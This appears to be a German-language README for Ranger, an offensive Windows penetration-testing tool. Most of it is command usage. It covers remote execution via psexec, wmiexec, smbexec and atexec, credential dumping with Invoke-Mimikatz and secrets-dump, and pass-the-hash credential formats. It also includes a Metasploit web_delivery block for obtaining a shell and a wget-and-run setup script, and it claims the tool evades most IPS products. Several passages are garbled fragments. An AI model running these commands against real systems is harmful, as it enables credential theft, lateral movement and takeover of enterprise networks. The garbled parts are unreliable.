
Ein Tool für Sicherheitsexperten, um auf entfernte Microsoft Windows-basierte Systeme zuzugreifen und mit ihnen zu interagieren.
Ein Werkzeug zur Unterstützung von Sicherheitsexperten beim Zugriff auf und der Interaktion mit entfernten Microsoft Windows-basierten Systemen.
Dieses Projekt wurde mit dem Gedanken konzipiert, dass wir weder den Bogen noch den Pfeil erfunden haben, sondern nur eine effizientere Art der Nutzung.
Ranger ist ein kommandozeilenbasiertes Angriffs- und Penetrationstest-Werkzeug, das die Fähigkeit besitzt, einen instantiierten Katapult-Server zu verwenden, um Fähigkeiten gegen Windows-Systeme auszuliefern. Solange ein Benutzer einen Satz von Anmeldeinformationen oder einen Hash-Satz (NTLM, LM, LM:NTLM) besitzt, kann er auf Systeme zugreifen, die Teil der Vertrauensstellung sind.
Mit dieser Fähigkeit kann ein Sicherheitsexperte Anmeldeinformationen im Klartext aus dem Speicher extrahieren, auf SAM-Tabellen zugreifen, Befehle ausführen, PowerShell-Skripte, Windows-Binärdateien und andere Werkzeuge ausführen. Derzeit umgeht das Werkzeug die Mehrheit der IPS-Herstellerlösungen, es sei denn, sie wurden speziell darauf abgestimmt, es zu erkennen. Das Werkzeug wurde in unseren Heimlaboren entwickelt, um Sicherheitsexperten bei rechtlich und/oder vertraglich unterstützten Aktivitäten zu unterstützen.
Weitere Funktionen werden hinzugefügt, aber derzeit nutzt das Werkzeug die Community-Beiträge aus Repositorys der Teams PowerView, PowerShell Mimikatz und Impacket.
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
ranger.py --invoker -q -v -vv -vvv
ranger.py --downloader -q -v -vv -vvv
ranger.py --executor -q -v -vv -vvv
--get-domain-membership bestimmen.--domain, mit der Sie eine andere Domäne als die, bei der Sie angemeldet sind, anvisieren können.ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
-d angeben, wird davon ausgegangen, dass Sie alle Domänennamen in der Datei ignorieren möchten.password
LM:NTLM
:NTLM
PWDUMP
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xmlt in den Befehlen durch e.-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml-f geändert werden kann.-a geändert werden kann.-f als auch -a, wenn Sie den Befehl ändern möchten; um die Verwendung von -a zu vermeiden, können Sie Executor verwenden.-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x identifiziert wird.-f definiert werden.-a weiter definieren, falls das Werkzeug dies erfordert.-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x "im.ps1" -f "Invoke-Mimikatz -DumpCredsuse exploit/multi/script/web_delivery
set targets 2
set payload <choose your desired payload>
set lhost <your IP>
set lport <port for the shell make sure it is not a conflicting port>
set URIPATH /
set SRVPORT <the same as what is set by the -r option in ranger, defaults to 8888>
exploit -j
##FAQ
Ich erhalte Zugriff verweigert Fehler auf Windows-Maschinen, die Teil einer WORKGROUP sind.
Wenn Sie nicht Teil einer Domäne sind, hat Windows standardmäßig keine administrativen Freigaben. SMBEXEC ist auf aktivierte Freigaben angewiesen. Außerdem ist WMIC auf WORKGROUP-Maschinen nicht aktiviert. SMBEXEC und WMIEXEC wurden entwickelt, um Protokolle anzugreifen, die auf Domänensystemen aktiviert sind. Es ist zwar möglich, diese Funktionen auf einem WORKGROUP-System zu aktivieren, aber beachten Sie, dass Sie damit anfällige Protokolle einführen (schließlich ist das das, wofür dieses Werkzeug entwickelt wurde). Die Aktivierung dieser Funktionen auf Ihrem primären Heimrechner, den Ihr Partner auch für Facebook nutzt, ist wahrscheinlich keine gute Idee.
enum4linux verwenden und dann das Argument --share share_name in Ranger, um SMBEXEC auszuführen.https://pypi.python.org/pypi/colorama hinzufügen#Dankeschön:
[BSides Charm City 2016: 23. April 2016] (http://2016.bsidescharm.com/2016-talks/ranger-it-just-takes-one-account-to-take-down-an-enterprise)
[Video] (https://youtu.be/HrXTrPzdR2Q?list=PL0YXeUocWA4NAGPmYdKNmQEh8H6iL_4Ik)
[Black Arch Linux] (https://blackarch.org/)